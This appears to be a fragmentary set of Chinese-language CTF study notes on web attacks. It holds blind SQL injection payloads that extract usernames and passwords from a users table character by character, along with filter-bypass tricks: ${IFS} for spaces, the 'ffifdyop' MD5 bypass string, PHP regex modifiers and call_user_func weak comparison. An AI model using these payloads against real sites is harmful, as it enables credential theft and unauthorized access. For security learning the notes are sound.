id=1' and length((select group_concat(username,password) from users))>109--+
判断字段内容长度
?...id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
逐一检测内容。...# IF(expr,1,2) # 如果表达式 expr 结果为True 返回 1,否则返回 2;
id=if(length((select(database())))>0,1,2)
时间盲注
?...isD模式:
/i不区分大小写
/s匹配任何不可见字符,包括空格、制表符、换页符等等,等价于[fnrtv]
/D如果使用$限制结尾字符,则不允许结尾有换行;
绕过空格过滤可以用${IFS}替换空格,或者用...上面那几个字符任何一个都行,都可以被处理成_
ffifdyop——绕过中一个奇妙的字符串
绕过call_user_func()回调函数的返回值弱比较 可以用session_start,error_reporting